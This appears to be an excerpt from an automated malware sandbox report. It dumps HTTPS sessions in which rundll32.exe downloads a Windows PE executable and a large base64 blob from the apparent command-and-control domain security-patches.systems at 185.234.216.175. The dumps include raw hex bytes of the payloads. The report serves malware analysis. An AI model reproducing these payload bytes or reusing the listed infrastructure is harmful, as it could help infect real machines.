                                            2024-12-06 21:11:05 UTC1369INData Raw: 6e 61 74 65 20 6f 66 20 74 68 65 20 75 70 70 65 72 20 6c 65 66 74 20 63 6f 72 6e 65 72 20 6f 66 20 74 68 65 20 62 6f 75 6e 64 69 6e 67 20 72 65 63 74 61 6e 67 6c 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 43 6f 6e 74 72 6f 6c 5f 46 69 72 73 74 44 65 66 69 6e 65 73 20 74 68 65 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 20 68 61 73 20 74 68 65 20 66 6f 63 75 73 20 77 68 65 6e 20 74 68 65 20 64 69 61 6c 6f 67 20 69 73 20 63 72 65 61 74 65 64 2e 45 72 72 6f 72 4d 65 73 73 61 67 65 54 65 6d 70 6c 61 74 65 45 72 72 6f 72 20 66 6f 72 6d 61 74 74 69 6e 67 20 74 65 6d 70 6c 61 74 65 2c 20 6f 62 74 61 69 6e 65 64 20 66 72 6f 6d 20 75 73 65 72 20 65 64 2e 20 6f 72 20 6c 6f 63 61 6c 69 7a 65 72 73 2e 46 65 61 74 75 72 65 44 69 72 65 63 74 6f 72 79 5f 44 69 72 65
                                            Data Ascii: nate of the upper left corner of the bounding rectangle of the control.Control_FirstDefines the control that has the focus when the dialog is created.ErrorMessageTemplateError formatting template, obtained from user ed. or localizers.FeatureDirectory_Dire
                                            2024-12-06 21:11:05 UTC1369INData Raw: 20 2b 20 32 35 36 2a 47 20 2b 20 32 35 36 5e 32 2a 42 29 2e 52 65 71 75 69 72 65 64 20 6b 65 79 20 6f 66 20 61 20 44 69 72 65 63 74 6f 72 79 20 74 61 62 6c 65 20 72 65 63 6f 72 64 2e 20 54 68 69 73 20 69 73 20 61 63 74 75 61 6c 6c 79 20 61 20 70 72 6f 70 65 72 74 79 20 6e 61 6d 65 20 77 68 6f 73 65 20 76 61 6c 75 65 20 63 6f 6e 74 61 69 6e 73 20 74 68 65 20 61 63 74 75 61 6c 20 70 61 74 68 2c 20 73 65 74 20 65 69 74 68 65 72 20 62 79 20 74 68 65 20 41 70 70 53 65 61 72 63 68 20 61 63 74 69 6f 6e 20 6f 72 20 77 69 74 68 20 74 68 65 20 64 65 66 61 75 6c 74 20 73 65 74 74 69 6e 67 20 6f 62 74 61 69 6e 65 64 20 66 72 6f 6d 20 74 68 65 20 44 69 72 65 63 74 6f 72 79 20 74 61 62 6c 65 2e 52 65 6d 6f 74 65 20 65 78 65 63 75 74 69 6f 6e 20 6f 70 74 69 6f 6e 2c 20
                                            Data Ascii: + 256*G + 256^2*B).Required key of a Directory table record. This is actually a property name whose value contains the actual path, set either by the AppSearch action or with the default setting obtained from the Directory table.Remote execution option,
                                            2024-12-06 21:11:05 UTC1369INData Raw: 69 6e 65 73 20 74 68 65 20 74 61 62 20 6f 72 64 65 72 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 2e 20 54 68 65 20 6c 69 6e 6b 73 20 68 61 76 65 20 74 6f 20 66 6f 72 6d 20 6f 6e 65 20 6f 72 20 6d 6f 72 65 20 63 79 63 6c 65 73 21 48 65 6c 70 54 68 65 20 68 65 6c 70 20 73 74 72 69 6e 67 73 20 75 73 65 64 20 77 69 74 68 20 74 68 65 20 62 75 74 74 6f 6e 2e 20 54 68 65 20 74 65 78 74 20 69 73 20 6f 70 74 69 6f 6e 61 6c 2e 20 43 6f 6e 74 72 6f 6c 43 6f 6e 64 69 74 69 6f 6e 41 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 74 6f 20 74 68 65 20 44 69 61 6c 6f 67 20 74 61 62 6c 65 2c 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 2e 43 6f 6e 74 72 6f 6c 5f 41 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 74 6f 20 74 68 65 20 43 6f 6e 74 72 6f 6c 20 74 61 62 6c 65
                                            Data Ascii: ines the tab order of the controls. The links have to form one or more cycles!HelpThe help strings used with the button. The text is optional. ControlConditionA foreign key to the Dialog table, name of the dialog.Control_A foreign key to the Control table
                                            2024-12-06 21:11:05 UTC1170INData Raw: 6f 6d 20 61 63 74 69 6f 6e 45 78 74 65 6e 64 65 64 54 79 70 65 54 68 65 20 6e 75 6d 65 72 69 63 20 63 75 73 74 6f 6d 20 61 63 74 69 6f 6e 20 74 79 70 65 20 69 6e 66 6f 20 66 6c 61 67 73 2e 4e 61 6d 65 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 2e 48 43 65 6e 74 65 72 69 6e 67 48 6f 72 69 7a 6f 6e 74 61 6c 20 70 6f 73 69 74 69 6f 6e 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 20 6f 6e 20 61 20 30 2d 31 30 30 20 73 63 61 6c 65 2e 20 30 20 6d 65 61 6e 73 20 6c 65 66 74 20 65 6e 64 2c 20 31 30 30 20 6d 65 61 6e 73 20 72 69 67 68 74 20 65 6e 64 20 6f 66 20 74 68 65 20 73 63 72 65 65 6e 2c 20 35 30 20 63 65 6e 74 65 72 2e 56 43 65 6e 74 65 72 69 6e 67 56 65 72 74 69 63 61 6c 20 70 6f 73 69 74 69 6f 6e 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 20 6f 6e 20 61 20 30
                                            Data Ascii: om actionExtendedTypeThe numeric custom action type info flags.Name of the dialog.HCenteringHorizontal position of the dialog on a 0-100 scale. 0 means left end, 100 means right end of the screen, 50 center.VCenteringVertical position of the dialog on a 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549705185.234.216.1754437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-06 21:11:09 UTC125OUTGET /AdminAccounts.aspx HTTP/1.1
                                            User-Agent: Microsoft-WNS/11.0
                                            Host: security-patches.systems
                                            Cache-Control: no-cache
                                            2024-12-06 21:11:10 UTC252INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:10 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Fri, 06 Dec 2024 08:34:45 GMT
                                            ETag: "4e000-62895e318030d"
                                            Accept-Ranges: bytes
                                            Content-Length: 319488
                                            Connection: close
                                            2024-12-06 21:11:10 UTC7940INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 80 b9 36 3d c4 d8 58 6e c4 d8 58 6e c4 d8 58 6e 17 aa 5b 6f ce d8 58 6e 17 aa 5d 6f 4c d8 58 6e 17 aa 5c 6f d0 d8 58 6e c2 59 5d 6f db d8 58 6e c2 59 5c 6f d4 d8 58 6e c2 59 5b 6f d0 d8 58 6e 17 aa 59 6f cf d8 58 6e c4 d8 59 6e b2 d8 58 6e ae 59 5d 6f c6 d8 58 6e ae 59 58 6f c5 d8 58 6e ae 59 5a 6f c5 d8 58 6e 52 69 63 68 c4 d8 58 6e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6=XnXnXn[oXn]oLXn\oXnY]oXnY\oXnY[oXnYoXnYnXnY]oXnYXoXnYZoXnRichXnPEL
                                            2024-12-06 21:11:10 UTC16384INData Raw: c7 45 b0 66 4c e7 ea 89 55 b4 a0 44 a1 04 10 88 45 ff c7 45 dc 22 00 00 00 8b 0d 78 a1 04 10 33 d2 89 8d 14 fd ff ff 89 95 18 fd ff ff c7 85 38 fd ff ff 6f 9d ef f4 c6 45 95 40 0f b6 05 bb a0 04 10 99 89 85 0c fd ff ff 89 95 10 fd ff ff a1 d8 a0 04 10 8b 0d dc a0 04 10 89 8d 34 fd ff ff 89 85 30 fd ff ff c6 45 83 5f 8b 15 88 a1 04 10 a1 8c a1 04 10 89 85 2c fd ff ff 89 95 28 fd ff ff 8b 0d 40 a1 04 10 89 8d 24 fd ff ff 8b 15 18 a1 04 10 89 95 20 fd ff ff a0 28 a1 04 10 88 45 96 8b 0d 68 a1 04 10 8b 15 6c a1 04 10 89 8d 04 fd ff ff 89 95 08 fd ff ff 66 0f be 05 3f a0 04 10 66 89 85 9c fe ff ff 33 c9 c7 85 fc fc ff ff 4c 99 fc 6e 89 8d 00 fd ff ff 8b 15 30 a1 04 10 a1 34 a1 04 10 89 85 1c fd ff ff 88 55 97 66 0f b6 0d bc a0 04 10 66 89 8d a0 fe ff ff 8b 15
                                            Data Ascii: EfLUDEE"x38oE@40E_,(@$ (Ehlf?f3Ln04Uff
                                            2024-12-06 21:11:10 UTC16384INData Raw: 95 cc fe ff ff 75 0c c7 85 c8 fe ff ff 01 00 00 00 eb 0a c7 85 c8 fe ff ff 00 00 00 00 0f b7 45 f0 85 c0 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 0f b6 0d 6b a0 04 10 f7 d1 03 0d 58 a1 04 10 75 14 33 d2 c7 85 e4 fd ff ff 01 00 00 00 89 95 e8 fd ff ff eb 0b 0f 57 c0 66 0f 13 85 e4 fd ff ff 8b 85 c8 fe ff ff 0f af 85 c4 fe ff ff 99 8b f0 0f b6 45 fd 99 8b 4d bc 8b 7d c0 2b c8 1b fa 57 51 8b 95 e8 fd ff ff 52 8b 85 e4 fd ff ff 50 e8 bd 7d 02 00 33 f0 89 35 40 a1 04 10 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 0f be 45 ff 05 4a 36 34 5b 99 89 8d 58 fc ff ff 89 b5 5c fc ff ff 89 85 50 fc ff ff 89 95 54 fc ff ff 8b 95 58 fc ff ff 3b 95 50 fc ff ff 75 44 8b 85 5c fc ff ff 3b 85 54 fc ff ff 75 36 8b 4d bc 8b 55 c0 89 95 a0 fa ff ff 81 c1
                                            Data Ascii: uEukXu3WfEM}+WQRP}35@5EJ64[X\PTX;PuD\;Tu6MU
                                            2024-12-06 21:11:10 UTC16384INData Raw: ff ff 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 8b 55 d0 f7 d2 0f af 55 b4 0f be 05 92 a0 04 10 33 d0 8b 8d c8 fe ff ff 03 8d c4 fe ff ff 0f af d1 88 55 ff 83 3d 90 a1 04 10 01 0f 85 24 01 00 00 ba 01 00 00 00 66 89 15 50 a1 04 10 0f b6 45 fd f7 d0 99 8b 0d c0 a0 04 10 8b 35 c4 a0 04 10 56 51 52 50 e8 e9 3d 02 00 f7 d0 66 89 45 e4 0f b7 15 50 a1 04 10 89 95 c0 fe ff ff 83 bd c0 fe ff ff 00 74 0e 83 bd c0 fe ff ff 01 74 24 e9 a7 00 00 00 a1 04 a1 04 10 0f af 05 44 a1 04 10 8b 0d 04 a1 04 10 03 c8 89 0d 04 a1 04 10 e9 88 00 00 00 8b 15 f8 a0 04 10 a1 fc a0 04 10 89 95 c0 fa ff ff 89 85 c4 fa ff ff 8b 8d c0 fa ff ff 0b 8d c4 fa ff ff 75 0c c7 85 bc fe ff ff 01 00 00 00 eb 0a c7 85 bc fe ff ff 00 00 00 00 8b 0d d8 a0 04 10 8b 35
                                            Data Ascii: uUU3U=$fPE5VQRP=fEPtt$Du5
                                            2024-12-06 21:11:10 UTC16384INData Raw: 89 8d f8 fe ff ff ba 74 00 00 00 66 89 95 fa fe ff ff b8 63 00 00 00 66 89 85 fc fe ff ff b9 68 00 00 00 66 89 8d fe fe ff ff ba 65 00 00 00 66 89 95 00 ff ff ff b8 73 00 00 00 66 89 85 02 ff ff ff b9 2e 00 00 00 66 89 8d 04 ff ff ff ba 73 00 00 00 66 89 95 06 ff ff ff b8 79 00 00 00 66 89 85 08 ff ff ff b9 73 00 00 00 66 89 8d 0a ff ff ff ba 74 00 00 00 66 89 95 0c ff ff ff b8 65 00 00 00 66 89 85 0e ff ff ff b9 6d 00 00 00 66 89 8d 10 ff ff ff ba 73 00 00 00 66 89 95 12 ff ff ff b8 2f 00 00 00 66 89 85 14 ff ff ff b9 76 00 00 00 66 89 8d 16 ff ff ff ba 65 00 00 00 66 89 95 18 ff ff ff b8 72 00 00 00 66 89 85 1a ff ff ff b9 69 00 00 00 66 89 8d 1c ff ff ff ba 66 00 00 00 66 89 95 1e ff ff ff b8 2e 00 00 00 66 89 85 20 ff ff ff b9 61 00 00 00 66 89 8d 22
                                            Data Ascii: tfcfhfefsf.fsfyfsftfefmfsf/fvfefrfifff.f af"
                                            2024-12-06 21:11:10 UTC16384INData Raw: e0 03 33 c9 89 45 c4 89 4d c8 eb 22 8b 15 d0 a0 04 10 0b 15 d4 a0 04 10 74 14 0f b7 05 50 a1 04 10 69 c8 34 ad ca d5 66 89 0d 24 a1 04 10 eb 2b 8b 45 cc 99 03 45 bc 13 55 c0 03 45 bc 13 55 c0 89 45 bc 89 55 c0 ba ea 51 08 00 c7 05 f8 a0 04 10 20 d7 b8 e4 89 15 fc a0 04 10 8b 85 54 ff ff ff 83 c0 45 89 85 58 fa ff ff 0f b6 0d bc a0 04 10 c1 e1 06 89 4d e0 a1 5c a1 04 10 99 2d 7a 76 a7 c4 8b 55 e0 0b d0 89 55 e0 8b 85 54 ff ff ff 83 c0 20 89 85 38 fe ff ff 8b 0d e0 a0 04 10 8b 15 e4 a0 04 10 89 95 54 fa ff ff 81 e9 d7 00 00 00 89 0d 5c a1 04 10 0f b7 45 f8 0f b6 4d fe 23 c1 0f b7 55 f8 03 d0 66 89 55 f8 8b 85 38 fe ff ff 03 85 38 fe ff ff b9 fe 01 00 00 2b c8 89 8d b4 fc ff ff 33 d2 88 55 a0 68 04 01 00 00 8d 85 44 f6 ff ff 50 8d 8d fa f8 ff ff 51 8d 4d a0
                                            Data Ascii: 3EM"tPi4f$+EEUEUEUQ TEXM\-zvUUT 8T\EM#UfU88+3UhDPQM
                                            2024-12-06 21:11:10 UTC16384INData Raw: 88 a1 04 10 8b 15 8c a1 04 10 f7 d1 f7 d2 89 8d e0 fc ff ff 89 95 e4 fc ff ff 81 bd e0 fc ff ff 68 27 84 f0 75 18 81 bd e4 fc ff ff 70 c6 f4 ff 75 0c c7 85 b0 fe ff ff 01 00 00 00 eb 0a c7 85 b0 fe ff ff 00 00 00 00 8b 85 b4 fe ff ff 3b 85 b0 fe ff ff 7c 0c c7 85 ac fe ff ff 01 00 00 00 eb 0a c7 85 ac fe ff ff 00 00 00 00 8b 8d ac fe ff ff f7 d1 85 c9 74 39 8b 15 10 a1 04 10 81 c2 e2 00 00 00 a1 54 a1 04 10 03 c2 a3 54 a1 04 10 0f bf 0d 20 a1 04 10 0f bf 15 00 a1 04 10 2b ca 0f bf 05 20 a1 04 10 03 c1 66 a3 20 a1 04 10 eb 26 0f bf 4d f0 85 c9 74 1e 0f bf 15 20 a1 04 10 81 f2 28 f9 00 00 66 89 15 00 a1 04 10 a0 78 ac 04 10 a2 bc a0 04 10 8b 4d 98 51 6a 00 ff 15 44 b0 03 10 50 ff 15 3c b0 03 10 89 45 94 33 d2 c7 05 f8 a0 04 10 e0 1a c3 4f 89 15 fc a0 04 10
                                            Data Ascii: h'upu;|t9TT + f &Mt (fxMQjDP<E3O
                                            2024-12-06 21:11:10 UTC16384INData Raw: f5 ff ff 38 00 00 00 0f b6 05 6b a0 04 10 99 89 85 5c f4 ff ff 89 95 60 f4 ff ff c7 85 84 f4 ff ff 44 fc 96 51 c7 85 88 f4 ff ff ba 21 a8 0b 8b 0d 90 a1 04 10 66 89 8d 2c fb ff ff 0f b6 05 6b a0 04 10 99 89 85 54 f4 ff ff 89 95 58 f4 ff ff c7 85 90 f4 ff ff c9 e8 4c 74 8b 15 4c a1 04 10 89 95 94 f4 ff ff c7 85 98 f4 ff ff be aa 47 50 c7 85 9c f4 ff ff a9 00 00 00 66 a1 20 a1 04 10 88 85 e2 fe ff ff c6 85 e3 fe ff ff 80 c7 85 a0 f4 ff ff e0 c4 df 6c b9 e7 8b ff ff 66 89 8d 28 fb ff ff 0f b6 55 fa 69 c2 c1 f1 bd 3b 89 45 a4 8b 0d 04 a1 04 10 2b 4d b0 8b 15 04 a1 04 10 2b d1 89 15 04 a1 04 10 a1 78 ac 04 10 89 85 d8 fe ff ff c7 85 dc fe ff ff 00 00 00 00 eb 0f 8b 8d dc fe ff ff 83 c1 01 89 8d dc fe ff ff 83 bd dc fe ff ff 63 0f 8d 4f 01 00 00 83 3d 4c a1 04
                                            Data Ascii: 8k\`DQ!f,kTXLtLGPf lf(Ui;E+M+xcO=L
                                            2024-12-06 21:11:11 UTC16384INData Raw: 55 c0 52 e8 54 fe 00 00 a2 bb a0 04 10 0f be 05 17 a0 04 10 89 85 44 fd ff ff 83 bd 44 fd ff ff 04 0f 87 a2 00 00 00 8b 8d 44 fd ff ff ff 24 8d b0 1d 02 10 8a 15 78 ac 04 10 88 15 56 a0 04 10 a1 5c a1 04 10 99 05 92 2e c4 3a 81 d2 79 3c 0a 00 33 c9 03 05 7c a1 04 10 13 d1 a3 d0 a0 04 10 89 15 d4 a0 04 10 eb 61 0f b6 45 fe 99 a3 30 a1 04 10 89 15 34 a1 04 10 8b 55 98 2b 55 d8 8b 45 9c 1b 45 dc 89 55 98 89 45 9c eb 3d 8b 4d d0 8b 55 d4 a1 64 a1 04 10 2b 0d 60 a1 04 10 1b d0 89 4d d0 89 55 d4 eb 22 0f b6 0d 6b a0 04 10 0f be 15 17 a0 04 10 0f af ca 88 4d ff eb 0c 33 c0 c7 45 d8 a4 50 00 00 89 45 dc c7 85 28 ff ff ff 00 00 00 00 eb 0f 8b 8d 28 ff ff ff 83 c1 02 89 8d 28 ff ff ff 81 bd 28 ff ff ff f5 01 00 00 0f 8d 89 00 00 00 0f b6 55 fa 0f be 05 17 a0 04 10
                                            Data Ascii: URTDDD$xV\.:y<3|aE04U+UEEUE=MUd+`MU"kM3EPE((((U
                                            2024-12-06 21:11:11 UTC16384INData Raw: ff ff 3b 4d c0 77 19 72 0b 8b 95 58 fe ff ff 3b 55 bc 77 0c c7 85 e4 fe ff ff 01 00 00 00 eb 0a c7 85 e4 fe ff ff 00 00 00 00 8b 85 e8 fe ff ff f7 d0 3b 85 e4 fe ff ff 74 0c c7 85 d4 fe ff ff 01 00 00 00 eb 0a c7 85 d4 fe ff ff 00 00 00 00 8b 8d dc fe ff ff f7 d1 0f af 8d d8 fe ff ff 8b 95 d4 fe ff ff f7 d2 3b ca 7c 39 0f b7 05 cc a0 04 10 8b 0d 28 a1 04 10 2b c8 89 0d 28 a1 04 10 8b 15 58 a1 04 10 33 c0 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 56 51 50 52 e8 bf bd 00 00 a3 58 a1 04 10 eb 15 8b 55 b4 8b 45 b8 89 85 d4 fd ff ff 81 f2 3d 28 95 df 89 55 a8 e9 84 00 00 00 0f b7 4d ec 85 c9 75 0c c7 85 50 ff ff ff 01 00 00 00 eb 0a c7 85 50 ff ff ff 00 00 00 00 8b 15 04 a1 04 10 03 95 50 ff ff ff 33 c0 89 15 c0 a0 04 10 a3 c4 a0 04 10 8b 0d 54 a1 04 10 33 d2 8b 45
                                            Data Ascii: ;MwrX;Uw;t;|9(+(X35VQPRXUE=(UMuPPP3T3E


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549706185.234.216.1754437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-06 21:11:12 UTC117OUTGET /verif.aspx HTTP/1.1
                                            User-Agent: Microsoft-WNS/11.0
                                            Host: security-patches.systems
                                            Cache-Control: no-cache
                                            2024-12-06 21:11:13 UTC252INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:13 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                            ETag: "d75c4-62796294faafa"
                                            Accept-Ranges: bytes
                                            Content-Length: 882116
                                            Connection: close
                                            2024-12-06 21:11:13 UTC7940INData Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b
                                            Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
                                            2024-12-06 21:11:13 UTC16384INData Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73
                                            Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
                                            2024-12-06 21:11:13 UTC16384INData Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e
                                            Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
                                            2024-12-06 21:11:13 UTC16384INData Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e
                                            Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
                                            2024-12-06 21:11:13 UTC16384INData Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32
                                            Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
